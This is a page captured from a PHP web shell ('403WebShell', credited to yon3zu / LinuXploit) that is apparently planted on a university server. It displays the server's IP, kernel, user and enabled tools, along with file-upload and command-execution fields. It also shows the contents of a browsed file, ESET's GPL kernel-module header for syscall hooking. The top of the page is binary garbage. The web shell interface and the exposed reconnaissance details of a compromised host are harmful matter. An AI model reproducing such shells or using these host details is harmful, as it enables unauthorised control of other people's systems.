h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/opt/eset/efs/eventd/eset_rtp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/opt/eset/efs/eventd/eset_rtp/ertp_handlers.h
/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#ifndef _ERTP_HANDLERS_H_

#define _ERTP_HANDLERS_H_

#include <linux/mman.h>
#include <linux/syscalls.h>
#include <linux/version.h>

#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#	define ERTP_KERNEL_USES_SYSCALL_WRAPPER 1
#endif

#ifdef ERTP_KERNEL_USES_SYSCALL_WRAPPER
#	include <asm/syscall.h>
#	include <asm/syscall_wrapper.h>
#endif

#ifdef CONFIG_COMPAT
#	include <linux/compat.h>
#endif

#include "ertp_syscalls.h"
#include "ertp.h"

/*********************** define syscall functions signatures *****************/

#ifdef ERTP_KERNEL_USES_SYSCALL_WRAPPER
/* there is the same signature in syscall table for all syscalls */
typedef asmlinkage long (*sys_regs_t)(const struct pt_regs *regs);
#endif

/*********************** define macros for old kernels ***********************/

#ifndef __MAP
#	define __MAP0(m,...)
#	define __MAP1(m,t,a,...) m(t,a)
#	define __MAP2(m,t,a,...) m(t,a), __MAP1(m,__VA_ARGS__)
#	define __MAP3(m,t,a,...) m(t,a), __MAP2(m,__VA_ARGS__)
#	define __MAP4(m,t,a,...) m(t,a), __MAP3(m,__VA_ARGS__)
#	define __MAP5(m,t,a,...) m(t,a), __MAP4(m,__VA_ARGS__)
#	define __MAP6(m,t,a,...) m(t,a), __MAP5(m,__VA_ARGS__)
#	define __MAP(n,...) __MAP##n(__VA_ARGS__)
#endif

#ifndef __SC_DECL
#	define __SC_DECL(t, a)	t a
#endif

#ifndef __SC_DECL1
#	define __SC_DECL1(t1, a1)	t1 a1
#	define __SC_DECL2(t2, a2, ...) t2 a2, __SC_DECL1(__VA_ARGS__)
#	define __SC_DECL3(t3, a3, ...) t3 a3, __SC_DECL2(__VA_ARGS__)
#	define __SC_DECL4(t4, a4, ...) t4 a4, __SC_DECL3(__VA_ARGS__)
#	define __SC_DECL5(t5, a5, ...) t5 a5, __SC_DECL4(__VA_ARGS__)
#	define __SC_DECL6(t6, a6, ...) t6 a6, __SC_DECL5(__VA_ARGS__)
#endif

#ifndef __SC_ARGS
#	define __SC_ARGS(t, a)	a
#endif

#ifndef __TYPE_IS_LL
#	define __TYPE_IS_LL(t) (__same_type((t)0, 0LL) || __same_type((t)0, 0ULL))
#endif

#ifndef __SC_LONG
#	define __SC_LONG(t, a) __typeof(__builtin_choose_expr(__TYPE_IS_LL(t), 0LL, 0L)) a
#endif

#ifndef __SC_TEST
#	define __SC_TEST(t, a) (void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(t) && sizeof(t) > sizeof(long))
#endif

/***** Syscall helpers for waiting on module unload till all caught syscall are finished *****/
extern atomic_t ertp_running_syscalls_counter;
extern wait_queue_head_t ertp_syscall_handlers_unregister_wait;

static inline void ertp_handler_start(void) {
	atomic_inc(&ertp_running_syscalls_counter);
}

static inline void ertp_handler_end(void) {
	if (unlikely(atomic_dec_and_test(&ertp_running_syscalls_counter))) {
		/* this was the last syscall, module can be now safely unloaded */
		wake_up(&ertp_syscall_handlers_unregister_wait);
	}
}

#ifndef fallthrough
#define fallthrough_defined_here 1
#if defined __has_attribute
#if __has_attribute(__fallthrough__)
# define fallthrough __attribute__((__fallthrough__))
#endif
#endif
#ifndef fallthrough
# define fallthrough do {} while (0)  /* fallthrough */
#endif
#endif

/* Helpers for syscall arguments transformations */
#ifdef CONFIG_IA32_EMULATION
static inline void ertp_syscall_args_to_regs32(unsigned int n, const unsigned long *args, struct pt_regs* regs)
{
	switch (n) {
		case 6: regs->bp = args[5];
		fallthrough;
		case 5: regs->di = args[4];
		fallthrough;
		case 4: regs->si = args[3];
		fallthrough;
		case 3: regs->dx = args[2];
		fallthrough;
		case 2: regs->cx = args[1];
		fallthrough;
		case 1: regs->bx = args[0];
		fallthrough;
		case 0: break;
		default:
			BUG();
			break;
	}
}
#endif

static inline void ertp_syscall_args_to_regs64(unsigned int n, const unsigned long *args, struct pt_regs* regs)
{
	switch (n) {
		case 6: regs->r9 = args[5];
		fallthrough;
		case 5: regs->r8 = args[4];
		fallthrough;
		case 4: regs->r10 = args[3];
		fallthrough;
		case 3: regs->dx = args[2];
		fallthrough;
		case 2: regs->si = args[1];
		fallthrough;
		case 1: regs->di = args[0];
		fallthrough;
		case 0: break;
		default:
			BUG();
			break;
	}
}

#ifdef fallthrough_defined_here
#undef fallthrough_defined_here
#undef fallthrough
#endif

/********************** define macros for syscall handlers *******************/
#ifdef CONFIG_IA32_EMULATION
#	if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,15,0) || LINUX_VERSION_CODE < KERNEL_VERSION(4,9,0) \
	|| defined(CONFIG_SUSE_KERNEL) || defined(AMZN_RELEASE_CODE) || defined(ERTP_IN_DEBIAN))
#		define ERTP_IN_IA32_SYSCALL unlikely((current_thread_info()->status & TS_COMPAT) != 0)
#	else
#		define ERTP_IN_IA32_SYSCALL unlikely((current->thread.status & TS_COMPAT) != 0)
#	endif
#else
#	define ERTP_IN_IA32_SYSCALL (0)
#endif

/* wrapper counting how many syscalls are handled in the moment */
#define ERTP_WRAPPED_SYSCALL_HANDLERx(x, name, ...) \
		static inline long notrace __ertp_##name(__MAP(x, __SC_DECL, __VA_ARGS__)); \
		SYSCALL_DEFINEx(x, _ertp_##name, __VA_ARGS__) { \
			long ret; \
			ertp_handler_start(); \
			ret = __ertp_##name(__MAP(x, __SC_ARGS, __VA_ARGS__)); \
			ertp_handler_end(); \
			return ret; \
		}\
		\
		static inline long notrace __ertp_##name(__MAP(x, __SC_DECL, __VA_ARGS__))

/* If kernel uses syscall wrapper */
#ifdef ERTP_KERNEL_USES_SYSCALL_WRAPPER

/*  pointers to original syscalls*/
#	define ERTP_SYS_ORIGX(x, syscall) ((sys_regs_t)ertp_sys_hook_original##x(ERTP_SYSCALL_##syscall))

/*  function names of syscall handlers */
#	define ERTP_HANDLER_64_FN(name) __x64_sys_ertp_##name

#	ifdef CONFIG_IA32_EMULATION
#		define ERTP_HANDLER_IA32_FN(name) __ia32_sys_ertp_##name
#	else
#		define ERTP_HANDLER_IA32_FN(name) NULL
#	endif

#	define __CALL_ORIG_SYSCALL(bits, name, regs)\
		ERTP_SYS_ORIGX(bits, name)(regs)

#	define ERTP_SYSCALL_HANDLERx(x, name, ...) \
		__diag_push();\
		__diag_ignore(GCC, 8, "-Wattribute-alias", \
			"Type aliasing is used to sanitize syscall arguments");\
		static inline long notrace __do_orig_##name(__MAP(x, __SC_DECL, __VA_ARGS__))\
			__attribute__((alias(__stringify(__orig_##name))));\
		static inline long notrace __orig_##name(__MAP(x, __SC_LONG, __VA_ARGS__));\
		static inline long notrace __orig_##name(__MAP(x, __SC_LONG, __VA_ARGS__))\
		{\
			struct pt_regs regs;\
			unsigned long args[SYSCALL_DEFINE_MAXARGS] = { __MAP(x, __SC_ARGS, __VA_ARGS__) };\
			__MAP(x,__SC_TEST,__VA_ARGS__);\
			\
			if (ERTP_IN_IA32_SYSCALL) {\
				ertp_syscall_args_to_regs32(x, args, &regs);\
				return __CALL_ORIG_SYSCALL(32, name, &regs);\
			} else {\
				ertp_syscall_args_to_regs64(x, args, &regs);\
				return __CALL_ORIG_SYSCALL(64, name, &regs);\
			}\
		}\
		__diag_pop();\
		ERTP_WRAPPED_SYSCALL_HANDLERx(x, name, __VA_ARGS__)
#else /* ERTP_KERNEL_USES_SYSCALL_WRAPPER */

/*  pointers to original syscalls*/
#	define ERTP_SYS_ORIGX(x, syscall) ((sys_##syscall##_t)ertp_sys_hook_original##x(ERTP_SYSCALL_##syscall))

/*  function names of syscall handlers - same for 64 and 32 bit on older kernels*/
#	define ERTP_HANDLER_64_FN(name) sys_ertp_##name

#	ifdef CONFIG_IA32_EMULATION
#		define ERTP_HANDLER_IA32_FN(name) sys_ertp_##name
#	else
#		define ERTP_HANDLER_IA32_FN(name) NULL
#	endif

#	define __CALL_ORIG_SYSCALL(bits, name, x, ...) \
		ERTP_SYS_ORIGX(bits, name)(__MAP(x, __SC_ARGS, __VA_ARGS__))

#	define ERTP_SYSCALL_HANDLERx(x, name, ...) \
		static inline long __do_orig_##name(__MAP(x, __SC_DECL, __VA_ARGS__))\
		{\
			if (ERTP_IN_IA32_SYSCALL) \
				return __CALL_ORIG_SYSCALL(32, name, x, __VA_ARGS__);\
			\
			return __CALL_ORIG_SYSCALL(64, name, x, __VA_ARGS__);\
		}\
		ERTP_WRAPPED_SYSCALL_HANDLERx(x, name, __VA_ARGS__)
#endif /* ERTP_KERNEL_USES_SYSCALL_WRAPPER */

#define ERTP_SYSCALL_HANDLER1(name, ...) ERTP_SYSCALL_HANDLERx(1, name, __VA_ARGS__)
#define ERTP_SYSCALL_HANDLER2(name, ...) ERTP_SYSCALL_HANDLERx(2, name, __VA_ARGS__)
#define ERTP_SYSCALL_HANDLER3(name, ...) ERTP_SYSCALL_HANDLERx(3, name, __VA_ARGS__)
#define ERTP_SYSCALL_HANDLER4(name, ...) ERTP_SYSCALL_HANDLERx(4, name, __VA_ARGS__)
#define ERTP_SYSCALL_HANDLER5(name, ...) ERTP_SYSCALL_HANDLERx(5, name, __VA_ARGS__)
#define ERTP_SYSCALL_HANDLER6(name, ...) ERTP_SYSCALL_HANDLERx(6, name, __VA_ARGS__)

/* Call original syscall function. Determine automatically whether 32 or 64 bit */
#define CALL_ORIGx(x, name, ...) __do_orig_##name(__VA_ARGS__)
#define CALL_ORIG1(name, ...) CALL_ORIGx(1, name, __VA_ARGS__)
#define CALL_ORIG2(name, ...) CALL_ORIGx(2, name, __VA_ARGS__)
#define CALL_ORIG3(name, ...) CALL_ORIGx(3, name, __VA_ARGS__)
#define CALL_ORIG4(name, ...) CALL_ORIGx(4, name, __VA_ARGS__)
#define CALL_ORIG5(name, ...) CALL_ORIGx(5, name, __VA_ARGS__)
#define CALL_ORIG6(name, ...) CALL_ORIGx(6, name, __VA_ARGS__)

/********************** define macros for syscall handlers *******************/

enum ertp_flt_rv ertp_check_all_open_files(enum ertp_flt_rv (*file_check_fn)(const struct file *));

/* ertp_execve_handlers.c */
int ertp_init_execve_handlers(void);
void ertp_deinit_execve_handlers(void);

#endif

Youez - 2016 - github.com/yon3zu
LinuXploit